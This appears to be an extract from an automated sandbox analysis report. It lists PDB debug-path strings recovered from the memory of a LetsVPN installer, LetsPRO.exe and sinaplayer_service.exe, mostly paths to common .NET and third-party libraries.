              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: letsvpn-latest.exe, 00000013.00000003.2419235971.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: letsvpn-latest.exe, 00000013.00000003.2374450534.0000000002835000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2485105994.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdb source: letsvpn-latest.exe, 00000013.00000003.2409548390.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebHeaderCollection\4.0.1.0\System.Net.WebHeaderCollection.pdb source: letsvpn-latest.exe, 00000013.00000003.2446699200.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding.Extensions\4.0.11.0\System.Text.Encoding.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2483211006.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: letsvpn-latest.exe, 00000013.00000003.2454328658.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2381721740.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Specialized\4.0.3.0\System.Collections.Specialized.pdb source: letsvpn-latest.exe, 00000013.00000003.2391660353.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\vendor\nuget\src\Core\obj\Release\NuGet.Squirrel.pdb source: letsvpn-latest.exe, 00000013.00000003.2375810206.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdb source: letsvpn-latest.exe, 00000013.00000003.2350329188.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdbSHA2569v'` source: letsvpn-latest.exe, 00000013.00000003.2438985801.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.PdbG source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.NonGeneric\4.0.3.0\System.Collections.NonGeneric.pdb source: letsvpn-latest.exe, 00000013.00000003.2391033106.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2381214379.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3950223249.00000000591D2000.00000002.00000001.01000000.0000002C.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdb source: letsvpn-latest.exe, 00000013.00000003.2387260703.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2362731884.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdb source: letsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: OriginalFilenameMono.Cecil.Pdb.dll6 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2363516673.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.MsDelta\obj\Release\DeltaCompressionDotNet.MsDelta.pdb source: letsvpn-latest.exe, 00000013.00000003.2326863486.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: letsvpn-latest.exe, 00000013.00000003.2380557489.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: letsvpn-latest.exe, 00000013.00000003.2474765747.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ComponentModel.Annotations/netfx\System.ComponentModel.Annotations.pdb source: letsvpn-latest.exe, 00000013.00000003.2393362455.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2444291104.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: letsvpn-latest.exe, 00000013.00000003.2381214379.0000000002834000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3950223249.00000000591D2000.00000002.00000001.01000000.0000002C.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Watcher\4.0.2.0\System.IO.FileSystem.Watcher.pdb source: letsvpn-latest.exe, 00000013.00000003.2422786884.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: letsvpn-latest.exe, 00000013.00000003.2456991625.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdb source: letsvpn-latest.exe, 00000013.00000003.2452142789.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdb source: letsvpn-latest.exe, 00000013.00000003.2474107011.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.PatchApi\obj\Release\DeltaCompressionDotNet.PatchApi.pdb source: letsvpn-latest.exe, 00000013.00000003.2327691194.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdb source: letsvpn-latest.exe, 00000013.00000003.2451342015.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdb source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x64\e_sqlite3.pdb source: letsvpn-latest.exe, 00000013.00000003.2537272011.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdb source: letsvpn-latest.exe, 00000013.00000003.2478798275.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdbon source: letsvpn-latest.exe, 00000013.00000003.2359617621.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdb source: letsvpn-latest.exe, 00000013.00000003.2471020373.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2477469430.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb source: letsvpn-latest.exe, 00000013.00000003.2411809176.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb'MAM 3M_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2414306472.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2379837248.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Debug\4.0.11.0\System.Diagnostics.Debug.pdb source: letsvpn-latest.exe, 00000013.00000003.2408110163.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FileDescriptionMono.Cecil.Pdb2 source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications\obj\Release\ToastNotifications.pdb source: letsvpn-latest.exe, 00000013.00000003.2505104084.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: letsvpn-latest.exe, 00000013.00000003.2351921276.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000038.00000002.3935799668.000000002F832000.00000002.00000001.01000000.00000029.sdmp
              Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2415149418.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dlls, source: letsvpn-latest.exe, 00000013.00000003.2376519913.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2375693525.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2381616746.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2374330113.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377335396.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2377822909.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2381114597.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2378990816.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2379744971.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2385038113.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2383638970.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2382636946.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2380459987.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb4)N) @)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2470389956.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdb source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: letsvpn-latest.exe, 00000013.00000003.2358108445.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.Cci.Pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdb source: letsvpn-latest.exe, 00000013.00000003.2482513419.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdbh) source: letsvpn-latest.exe, 00000013.00000003.2426656105.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdbT*n* `*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2445404154.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\arm\e_sqlite3.pdb source: letsvpn-latest.exe, 00000013.00000003.2535561540.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.ThreadPool\4.0.12.0\System.Threading.ThreadPool.pdb source: letsvpn-latest.exe, 00000013.00000003.2492831621.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2360771712.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdb source: letsvpn-latest.exe, 00000013.00000003.2376617919.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: letsvpn-latest.exe, 00000013.00000003.2325389222.000000000283E000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000035.00000002.2771963199.000000000086D000.00000002.00000001.01000000.00000017.sdmp, LetsPRO.exe, 00000035.00000000.2754233915.000000000086D000.00000002.00000001.01000000.00000017.sdmp, LetsPRO.exe, 00000037.00000002.2836954621.000000000086D000.00000002.00000001.01000000.00000017.sdmp, LetsPRO.exe, 00000037.00000000.2823850009.000000000086D000.00000002.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Tools\4.0.1.0\System.Diagnostics.Tools.pdb source: letsvpn-latest.exe, 00000013.00000003.2413049289.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdb source: letsvpn-latest.exe, 00000013.00000003.2425444699.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Threading.Overlapped/netfx\System.Threading.Overlapped.pdb source: letsvpn-latest.exe, 00000013.00000003.2485799565.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdb source: letsvpn-latest.exe, 00000013.00000003.2362731884.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb+CEC 7C_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2348840467.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776724379.0000000005842000.00000002.00000001.01000000.0000001C.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Xml/netfx\System.Runtime.Serialization.Xml.pdb source: letsvpn-latest.exe, 00000013.00000003.2466181205.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdbt+ source: letsvpn-latest.exe, 00000013.00000003.2503453732.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization\4.0.11.0\System.Globalization.pdb source: letsvpn-latest.exe, 00000013.00000003.2418462698.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2442323739.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: letsvpn-latest.exe, 00000013.00000003.2495322784.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: letsvpn-latest.exe, 00000013.00000003.2436479526.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: letsvpn-latest.exe, 00000013.00000003.2469273215.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: letsvpn-latest.exe, 00000013.00000003.2381721740.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2394827139.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2473035374.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: letsvpn-latest.exe, 00000013.00000003.2502090326.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: letsvpn-latest.exe, 00000013.00000003.2383731148.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2454973040.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2463667544.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcr120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: letsvpn-latest.exe, 00000013.00000003.2476153727.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000002.3901746176.000000006C641000.00000020.00000001.01000000.0000000C.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: letsvpn-latest.exe, 00000013.00000003.2414306472.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: letsvpn-latest.exe, 00000013.00000003.2466635348.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: letsvpn-latest.exe, 00000013.00000003.2456991625.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: letsvpn-latest.exe, 00000013.00000003.2453541303.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2451342015.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: letsvpn-latest.exe, 00000013.00000003.2458044881.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: letsvpn-latest.exe, 00000013.00000003.2484351644.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: letsvpn-latest.exe, 00000013.00000003.2443629521.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: letsvpn-latest.exe, 00000013.00000003.2477469430.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: letsvpn-latest.exe, 00000013.00000003.2407310504.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2353177349.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000013.00000003.2540392620.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2362053914.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: letsvpn-latest.exe, 00000013.00000003.2350329188.0000000002832000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstandard.pdb.mdb source: letsvpn-latest.exe, 00000013.00000003.2324359693.0000000002833000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: letsvpn-latest.exe, 00000013.00000003.2472307011.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll source: letsvpn-latest.exe, 00000013.00000003.2370247542.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2364107536.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2366376901.0000000000598000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2365391125.0000000000598000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: letsvpn-latest.exe, 00000013.00000003.2476800836.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2457643638.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: letsvpn-latest.exe, 00000013.00000003.2452142789.0000000002833000.00000004.00000020.00020000.00000000.sdmp
